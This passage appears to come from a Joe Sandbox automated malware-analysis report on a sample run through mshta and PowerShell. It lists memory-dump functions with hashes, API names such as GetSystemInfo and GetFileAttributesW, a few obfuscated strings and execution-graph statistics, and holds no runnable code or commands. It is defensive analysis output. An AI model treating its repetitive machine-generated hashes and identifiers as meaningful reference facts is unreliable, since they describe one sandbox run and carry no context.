                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F41 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F81 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F61 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156
                                                                                                                                                                Function 0000025C98390F21 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000B.00000003.1753299678.0000025C98390000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000025C98390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_11_3_25c98390000_mshta.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction ID: 6b96d785f7bafc17d4179e51ec5979a3b04b44e9525dc4191be920b3615cac48
                                                                                                                                                                • Opcode Fuzzy Hash: 408bef09d469c2f46428e607b0c970413b7c389e1ff92e89cd5a5ac698755f7d
                                                                                                                                                                • Instruction Fuzzy Hash: C2900206499906E9D41411910C5926C50407388261FE454904427D1144E55E03965156

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:4.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:35.7%
                                                                                                                                                                Total number of Nodes:14
                                                                                                                                                                Total number of Limit Nodes:1
                                                                                                                                                                execution_graph 6467 7ffeb71182c1 6469 7ffeb71182cf GetFileAttributesW 6467->6469 6470 7ffeb7118376 6469->6470 6471 7ffeb7118b1a 6472 7ffeb712ce00 ComputeAccessTokenFromCodeAuthzLevel 6471->6472 6474 7ffeb712ceae 6472->6474 6458 7ffeb71134ac 6459 7ffeb71134b5 6458->6459 6462 7ffeb7112610 6459->6462 6461 7ffeb7113533 6463 7ffeb7112615 6462->6463 6464 7ffeb712d443 GetSystemInfo 6463->6464 6466 7ffeb712d3b0 6463->6466 6465 7ffeb712d47e 6464->6465 6465->6461 6466->6461

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00007FFEB7112610 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                • Opcode ID: 454b5ee7c7e2f3d61803342ca335c442d90d7a0b9206a1f78d4074454ad86f46
                                                                                                                                                                • Instruction ID: 1c115e247227888313d3944c8ddbd2ad1231d5e17e05dba3979936cff2a5384b
                                                                                                                                                                • Opcode Fuzzy Hash: 454b5ee7c7e2f3d61803342ca335c442d90d7a0b9206a1f78d4074454ad86f46
                                                                                                                                                                • Instruction Fuzzy Hash: BB41247190CA4D4FEB58DB6CC84A6F97BE0EF55320F04027FE18DC35A2DB64645A8B91
                                                                                                                                                                Function 00007FFEB71182C1 Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: 49c8fd36a7a7a35ac05a087e695f93dc2a18948933ca570b0c29358f91e7c00a
                                                                                                                                                                • Instruction ID: 0be6820e2487ca8371e655da0811ca9c568fbd74a9a33f3e5bece790568e7e65
                                                                                                                                                                • Opcode Fuzzy Hash: 49c8fd36a7a7a35ac05a087e695f93dc2a18948933ca570b0c29358f91e7c00a
                                                                                                                                                                • Instruction Fuzzy Hash: 6841053190DA8D4FDB5ADB6C88456E9BFE0EF56320F08427BC049D79A2CF74A815C7A1
                                                                                                                                                                Function 00007FFEB711757A Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                • Opcode ID: caa7592589eaf94c6e66f19aeea19c736c9dcf31aa93b2990b8166422fd8ed7e
                                                                                                                                                                • Instruction ID: 7bf78860579a3973f81d29cbf142f446737156f42ac7a09f8ff823c8299e5bef
                                                                                                                                                                • Opcode Fuzzy Hash: caa7592589eaf94c6e66f19aeea19c736c9dcf31aa93b2990b8166422fd8ed7e
                                                                                                                                                                • Instruction Fuzzy Hash: 2441023190CA1D8FDB59DB6C88496F9BBE0EF55320F04827BD009D7AA1CF74A81687A1
                                                                                                                                                                Function 00007FFEB7118B1A Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2022643969.00007FFEB7110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7110000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7110000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 132034935-0
                                                                                                                                                                • Opcode ID: 4841bef09574e4edd2f3270fa95eee1970d42895945ec1dbb3ab65a2a0dff26e
                                                                                                                                                                • Instruction ID: b757a1d34620ec37bed779e5b399f110728b44fc8a83d10f33eb25a56ebf08f7
                                                                                                                                                                • Opcode Fuzzy Hash: 4841bef09574e4edd2f3270fa95eee1970d42895945ec1dbb3ab65a2a0dff26e
                                                                                                                                                                • Instruction Fuzzy Hash: 1E31D471908A1C8FDB08DF5CD8496F97BE1FB69321F00422FE049E3651DB70A8068BC1
                                                                                                                                                                Function 00007FFEB7A43899 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 99f76ae1b8e7da8d82cb8992b522bb659d5c3e35856a3bed09ed0d06c4d4b506
                                                                                                                                                                • Instruction ID: 4c34a5269db18d4bec6071d24e623194a86747297d5b627aed2df0296adf0dbc
                                                                                                                                                                • Opcode Fuzzy Hash: 99f76ae1b8e7da8d82cb8992b522bb659d5c3e35856a3bed09ed0d06c4d4b506
                                                                                                                                                                • Instruction Fuzzy Hash: 0451B37090968A8FDB85EF28C8146A97BF0FF59300F1445BAD109CB5B3CB39A951CB40
                                                                                                                                                                Function 00007FFEB7746015 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2034013084.00007FFEB7740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7740000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7740000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 985465809cd0843534b6771798007f8a3656df69fc3f2fcca9f93fb8deb30b33
                                                                                                                                                                • Instruction ID: b08aa69c712754f14b6f75d56d80f8bc3ac75ab12959a9e556e9dcd7efb14849
                                                                                                                                                                • Opcode Fuzzy Hash: 985465809cd0843534b6771798007f8a3656df69fc3f2fcca9f93fb8deb30b33
                                                                                                                                                                • Instruction Fuzzy Hash: 6B519F3091894C9FDB85EF58C498BB97BF1FF58315F140169E84ED72A2CB34A891CB41
                                                                                                                                                                Function 00007FFEB7A43835 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a0a035db2bb4c0ac75c8eeaf4644c8de3bfc7d4cc0afbdda30018748990e1b85
                                                                                                                                                                • Instruction ID: d3c2877cbd3216767efd7929c49314de3dd383159da6a9fe67411288c07b0ebd
                                                                                                                                                                • Opcode Fuzzy Hash: a0a035db2bb4c0ac75c8eeaf4644c8de3bfc7d4cc0afbdda30018748990e1b85
                                                                                                                                                                • Instruction Fuzzy Hash: 4B41843090964A8FDB89EF18C8646697BA1FF55305F5445FDD109CB5B3CB39E851CB40
                                                                                                                                                                Function 00007FFEB7A40F39 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 0e2b687d1c36fadb84c1191789909b11f20644cf4ab7614dedcc1180b2152bc6
                                                                                                                                                                • Instruction ID: 4fe4a4d0ba2eed9261aa68d5d86e4cd8150fe02ac7facdec2457d20e52a97894
                                                                                                                                                                • Opcode Fuzzy Hash: 0e2b687d1c36fadb84c1191789909b11f20644cf4ab7614dedcc1180b2152bc6
                                                                                                                                                                • Instruction Fuzzy Hash: BC31A13150CA4C9FDB49DBA8C845BE9BBF0FF56320F04426FD049C3562D765A456CB51
                                                                                                                                                                Function 00007FFEB774814F Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2034013084.00007FFEB7740000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7740000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7740000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b3b8b8a122360d5a35b7b5c2e97e4036b79d972602e0021be878accee52c3f6e
                                                                                                                                                                • Instruction ID: 1c47bfce630e057184f34b6f1539891129f5dedf1df24e87f5dd53fd053a7328
                                                                                                                                                                • Opcode Fuzzy Hash: b3b8b8a122360d5a35b7b5c2e97e4036b79d972602e0021be878accee52c3f6e
                                                                                                                                                                • Instruction Fuzzy Hash: 9B112724B1DA090BE354A65CA4423B573D1EF85720F5006BEE98E837B6CD19BC1283C2
                                                                                                                                                                Function 00007FFEB7410A7F Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2027108572.00007FFEB7410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7410000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7410000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 95ab425a1c4c76b8a80d32aae94e95a85f96c5a4d316315626529a828996a5d3
                                                                                                                                                                • Instruction ID: d14cf795e8713ffc585f44020c19faa2e2a11a321a06c3bdf1a180a71dbb33f8
                                                                                                                                                                • Opcode Fuzzy Hash: 95ab425a1c4c76b8a80d32aae94e95a85f96c5a4d316315626529a828996a5d3
                                                                                                                                                                • Instruction Fuzzy Hash: BE012622B0DA8A4FE7A6A32C04162BCBEC0EF6623675801FFC64DD39B2DE189C514351
                                                                                                                                                                Function 00007FFEB787248C Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2036351067.00007FFEB7870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7870000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7870000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 461eeb77397d25ed6731aca194b8ca34aa3b2c9a9382a9bb2665e170493c9b29
                                                                                                                                                                • Instruction ID: 511b8125136074356a524d6b358812c07bde787b3cb4e26d8d085fb366bc8428
                                                                                                                                                                • Opcode Fuzzy Hash: 461eeb77397d25ed6731aca194b8ca34aa3b2c9a9382a9bb2665e170493c9b29
                                                                                                                                                                • Instruction Fuzzy Hash: 46F0123032D8194FDB88EB1CD465AB577D1EBA4365B2401BDD40ACB695CE26AC51C781
                                                                                                                                                                Function 00007FFEB7A406F9 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f9f71b6fa98e2f7d76d914adb39b7795f4a62c65514db70af746b09ddd8be689
                                                                                                                                                                • Instruction ID: b4f0906ea2959e8f31331bc0b0a036496527acc85615b5e297c3ed2a306cc34b
                                                                                                                                                                • Opcode Fuzzy Hash: f9f71b6fa98e2f7d76d914adb39b7795f4a62c65514db70af746b09ddd8be689
                                                                                                                                                                • Instruction Fuzzy Hash: 76E0753031880E9FDB84EF2CC459A6977E1FF68301B110576A55EC76B2DE21EC51CB11
                                                                                                                                                                Function 00007FFEB7410AC0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2027108572.00007FFEB7410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7410000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7410000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: f7d159051816fa812653b9df7b396cdb266f50ed3ee6682968347ad4b42b99b7
                                                                                                                                                                • Instruction ID: 6e25b786c46251513f4b316f0dd73c82b68768cdf264e5e9a5fe8540629df955
                                                                                                                                                                • Opcode Fuzzy Hash: f7d159051816fa812653b9df7b396cdb266f50ed3ee6682968347ad4b42b99b7
                                                                                                                                                                • Instruction Fuzzy Hash: 77D01720E1AD2E4EE795A73C0119238A4C1EF98246BA002B8940ED3AB2DD28DC428240

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 00007FFEB75C11A0 Relevance: .7, Instructions: 681COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d9cf49a16f59b43f195a1d10755edca9cc3442ef18ef68be512bfe1d10623401
                                                                                                                                                                • Instruction ID: 57d660bbe20a7699724fbeb6076003aecca1708749cb3c66a867d0d6698a80ae
                                                                                                                                                                • Opcode Fuzzy Hash: d9cf49a16f59b43f195a1d10755edca9cc3442ef18ef68be512bfe1d10623401
                                                                                                                                                                • Instruction Fuzzy Hash: E2226070A1C6484FD798EB7C802537AB6D2EF89205F5486BDD14EC7AB3DE3998428741
                                                                                                                                                                Function 00007FFEB75C03CF Relevance: .4, Instructions: 373COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5370ce8d453af85e723e6fd2527a0a6cf59dce5b45a4dcd372de9cf426c6f826
                                                                                                                                                                • Instruction ID: c9c2803149f44cfff5e66179813593d6c718e1f4faa7d6d64c1067503c807867
                                                                                                                                                                • Opcode Fuzzy Hash: 5370ce8d453af85e723e6fd2527a0a6cf59dce5b45a4dcd372de9cf426c6f826
                                                                                                                                                                • Instruction Fuzzy Hash: 12C1AD70A1CA845FD358EB3C845527AB7E1EF89205F548ABED08EC76B3DE399842C741
                                                                                                                                                                Function 00007FFEB75C0EB2 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 6d3a51621bf69b9252a8a7112f677ac716043452d803d60085256e440f3c9980
                                                                                                                                                                • Instruction ID: de6d8809b9649dc9af558c59fabde4eb852b6e5bd6e856fcd0d35791a47255f5
                                                                                                                                                                • Opcode Fuzzy Hash: 6d3a51621bf69b9252a8a7112f677ac716043452d803d60085256e440f3c9980
                                                                                                                                                                • Instruction Fuzzy Hash: FF913170A1C6885FD349EB7C406527ABBD1EFCD215F548ABE908EC76B3DE3998028305
                                                                                                                                                                Function 00007FFEB75C018E Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2030458466.00007FFEB75C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB75C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb75c0000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 5d9fedb2b806451dce7a0e7fa568c42236ea1b4ab1368ccabc3321b3dca7431f
                                                                                                                                                                • Instruction ID: 70454ccb6b70f5b0ea0fda12781f3de84c2b0b14930c7e4c371cb210a1ddc477
                                                                                                                                                                • Opcode Fuzzy Hash: 5d9fedb2b806451dce7a0e7fa568c42236ea1b4ab1368ccabc3321b3dca7431f
                                                                                                                                                                • Instruction Fuzzy Hash: 5F918B30A2CA498FD758EB3C8415269B3E2EF89205F544ABDD14EC7AB3DE3998528741
                                                                                                                                                                Function 00007FFEB7A41EB3 Relevance: 6.4, Strings: 5, Instructions: 158COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "[%$^^'1$^^6)$^^>!$^^i
                                                                                                                                                                • API String ID: 0-2909005086
                                                                                                                                                                • Opcode ID: 027434a31d833dca80bedcadc21c14b71680cda84b9ca3ba7c9551a80a3f7093
                                                                                                                                                                • Instruction ID: 3b9c80d204aa6f390c05e071d01d5e7d40398c93c54724d39fb65148227298d8
                                                                                                                                                                • Opcode Fuzzy Hash: 027434a31d833dca80bedcadc21c14b71680cda84b9ca3ba7c9551a80a3f7093
                                                                                                                                                                • Instruction Fuzzy Hash: 9E414A23E0A6236ADA11BF7CB14A1DDFF91EF00775B104077E7888A053ED286096A3C5
                                                                                                                                                                Function 00007FFEB7A41E99 Relevance: 5.2, Strings: 4, Instructions: 154COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000C.00000002.2039707104.00007FFEB7A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFEB7A40000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ffeb7a40000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: "[%$^^6)$^^>!$^^i
                                                                                                                                                                • API String ID: 0-147050912
                                                                                                                                                                • Opcode ID: 6cd4f7cf45751e1162e895e59ecc6e1926a4dbe1254189d9c5536ce99a0c16c6
                                                                                                                                                                • Instruction ID: 0dd40ad29a8237a7673d26791da5265459eb6d16dc525aced184fb0550e78a94
                                                                                                                                                                • Opcode Fuzzy Hash: 6cd4f7cf45751e1162e895e59ecc6e1926a4dbe1254189d9c5536ce99a0c16c6
                                                                                                                                                                • Instruction Fuzzy Hash: B0414B23E0A62366DE11BF7CF5461E9FB91EF00376B104077E7888A052ED2960D6A3C5

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:5.5%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:18.1%
                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                Total number of Limit Nodes:91
